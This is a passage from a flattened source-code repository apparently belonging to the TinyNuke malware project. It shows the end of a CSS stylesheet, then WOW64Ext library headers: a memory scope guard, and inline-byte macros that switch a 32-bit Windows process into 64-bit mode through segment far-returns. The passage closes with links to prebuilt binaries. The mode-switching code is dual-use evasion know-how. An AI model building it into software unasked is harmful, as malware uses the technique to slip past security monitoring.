content-box; 83 | } 84 | 85 | form table td:first-child 86 | { 87 | padding-right: 10px; 88 | width: 1%; 89 | } 90 | 91 | .box 92 | { 93 | border: 1px solid #888; 94 | padding: 10px; 95 | background: #F2F2F2; 96 | border-radius: 2px; 97 | } 98 | 99 | .box div:first-child 100 | { 101 | font-style: italic; 102 | border-bottom: 1px solid #AAA; 103 | margin: -10px; 104 | margin-bottom: 10px; 105 | padding: 5px; 106 | background-image: linear-gradient(to top, #E8E8E8 0%, #FFF 50%, #F7F7F7 100%); 107 | } 108 | 109 | .box div:first-child:before, 110 | .box div:first-child:after 111 | { 112 | content: '~'; 113 | color: #AAA; 114 | padding-right: 5px; 115 | padding-left: 5px; 116 | } 117 | 118 | .margin-bottom 119 | { 120 | margin-bottom: 10px; 121 | } 122 | 123 | .margin-top 124 | { 125 | margin-top: 10px; 126 | } 127 | 128 | .info, .error 129 | { 130 | padding: 5px 0px; 131 | border: 1px solid; 132 | text-align: center; 133 | font-size: 12px; 134 | } 135 | 136 | .info 137 | { 138 | color: #00529B; 139 | background: #f2f2ff; 140 | } 141 | 142 | .error 143 | { 144 | color: #D8000C; 145 | background: #ffe5e5; 146 | } 147 | 148 | .box .input 149 | { 150 | width: 100%; 151 | } 152 | 153 | .table 154 | { 155 | border-collapse: collapse; 156 | width: 100%; 157 | } 158 | 159 | .table td, .table th 160 | { 161 | border: 1px solid #AAA; 162 | padding: 5px; 163 | } 164 | 165 | .table th 166 | { 167 | font-style: italic; 168 | background-image: linear-gradient(to top, #E8E8E8 0%, #FFF 50%, #F7F7F7 100%); 169 | font-weight: normal; 170 | border: 1px solid #888; 171 | } 172 | 173 | .table tr:nth-child(even) 174 | { 175 | background: #F7F7F7; 176 | } 177 | 178 | .table tr:nth-child(odd) 179 | { 180 | background: #F2F2F2; 181 | } 182 | 183 | .disabled 184 | { 185 | pointer-events: none; 186 | cursor: default; 187 | opacity: 0.6; 188 | } 189 | 190 | .footer 191 | { 192 | text-align: center; 193 | padding: 5px 0px; 194 | border: 1px solid #888; 195 | border-top: 0px; 196 | 
background-image: linear-gradient(to top, #E8E8E8 0%, #FFF 50%, #F2F2F2 100%); 197 | color: #666; 198 | } -------------------------------------------------------------------------------- /wow64ext/CMemPtr.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * WOW64Ext Library 4 | * 5 | * Copyright (c) 2014 ReWolf 6 | * http://blog.rewolf.pl/ 7 | * 8 | * This program is free software: you can redistribute it and/or modify 9 | * it under the terms of the GNU Lesser General Public License as published 10 | * by the Free Software Foundation, either version 3 of the License, or 11 | * (at your option) any later version. 12 | * 13 | * This program is distributed in the hope that it will be useful, 14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | * GNU Lesser General Public License for more details. 17 | * 18 | * You should have received a copy of the GNU Lesser General Public License 19 | * along with this program. If not, see . 
20 | * 21 | */ 22 | #pragma once 23 | /* Scope guard for a heap pointer held in a caller's variable. It stores the address of that variable; unless disableWatch() was called, the destructor passes a non-null *m_ptr to free() and then zeroes the variable. This header includes nothing itself, so free() must already be declared by the including file. */ 24 | class CMemPtr 25 | { 26 | private: 27 | void** m_ptr; 28 | bool watchActive; 29 | 30 | public: 31 | CMemPtr(void** ptr) : m_ptr(ptr), watchActive(true) {} 32 | /* Dereferences m_ptr unconditionally, so the watched variable must still be alive when the guard is destroyed. */ 33 | ~CMemPtr() 34 | { 35 | if (*m_ptr && watchActive) 36 | { 37 | free(*m_ptr); 38 | *m_ptr = 0; 39 | } 40 | } 41 | 42 | void disableWatch() { watchActive = false; } 43 | }; 44 | /* WATCH(p) declares a guard named watch_p bound to &p (cast to void**); p has to be a single identifier because of the ## paste. NOTE(review): presumably p holds memory from the malloc() family, since the guard releases it with free() - confirm at the call sites. */ 45 | #define WATCH(ptr) \ 46 | CMemPtr watch_##ptr((void**)&ptr) 47 | /* DISABLE_WATCH(p) switches off the guard declared by WATCH(p), so p is left allocated when the scope ends and the caller keeps ownership. */ 48 | #define DISABLE_WATCH(ptr) \ 49 | watch_##ptr.disableWatch() 50 | -------------------------------------------------------------------------------- /wow64ext/internal.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * WOW64Ext Library 4 | * 5 | * Copyright (c) 2014 ReWolf 6 | * http://blog.rewolf.pl/ 7 | * 8 | * This program is free software: you can redistribute it and/or modify 9 | * it under the terms of the GNU Lesser General Public License as published 10 | * by the Free Software Foundation, either version 3 of the License, or 11 | * (at your option) any later version. 12 | * 13 | * This program is distributed in the hope that it will be useful, 14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | * GNU Lesser General Public License for more details. 17 | * 18 | * You should have received a copy of the GNU Lesser General Public License 19 | * along with this program. If not, see . 
20 | * 21 | */ 22 | #pragma once 23 | 24 | #define EMIT(a) __asm __emit (a) 25 | 26 | #define X64_Start_with_CS(_cs) \ 27 | { \ 28 | EMIT(0x6A) EMIT(_cs) /* push _cs */ \ 29 | EMIT(0xE8) EMIT(0) EMIT(0) EMIT(0) EMIT(0) /* call $+5 */ \ 30 | EMIT(0x83) EMIT(4) EMIT(0x24) EMIT(5) /* add dword [esp], 5 */ \ 31 | EMIT(0xCB) /* retf */ \ 32 | } 33 | 34 | #define X64_End_with_CS(_cs) \ 35 | { \ 36 | EMIT(0xE8) EMIT(0) EMIT(0) EMIT(0) EMIT(0) /* call $+5 */ \ 37 | EMIT(0xC7) EMIT(0x44) EMIT(0x24) EMIT(4) EMIT(_cs) EMIT(0) EMIT(0) EMIT(0) /* mov dword [rsp + 4], _cs */ \ 38 | EMIT(0x83) EMIT(4) EMIT(0x24) EMIT(0xD) /* add dword [rsp], 0xD */ \ 39 | EMIT(0xCB) /* retf */ \ 40 | } 41 | 42 | #define X64_Start() X64_Start_with_CS(0x33) 43 | #define X64_End() X64_End_with_CS(0x23) 44 | 45 | #define _RAX 0 46 | #define _RCX 1 47 | #define _RDX 2 48 | #define _RBX 3 49 | #define _RSP 4 50 | #define _RBP 5 51 | #define _RSI 6 52 | #define _RDI 7 53 | #define _R8 8 54 | #define _R9 9 55 | #define _R10 10 56 | #define _R11 11 57 | #define _R12 12 58 | #define _R13 13 59 | #define _R14 14 60 | #define _R15 15 61 | 62 | #define X64_Push(r) EMIT(0x48 | ((r) >> 3)) EMIT(0x50 | ((r) & 7)) 63 | #define X64_Pop(r) EMIT(0x48 | ((r) >> 3)) EMIT(0x58 | ((r) & 7)) 64 | 65 | #define REX_W EMIT(0x48) __asm 66 | 67 | //to fool M$ inline asm compiler I'm using 2 DWORDs instead of DWORD64 68 | //use of DWORD64 will generate wrong 'pop word ptr[]' and it will break stack 69 | union reg64 70 | { 71 | DWORD64 v; 72 | DWORD dw[2]; 73 | }; 74 | -------------------------------------------------------------------------------- /wow64ext/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 
3 | // Used by wow64ext.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /wow64ext/wow64ext.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/wow64ext/wow64ext.dll -------------------------------------------------------------------------------- /wow64ext/wow64ext.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rossja/TinyNuke/c1e04c36d3aa2dbd70fcb17063809798b00b1fcf/wow64ext/wow64ext.lib --------------------------------------------------------------------------------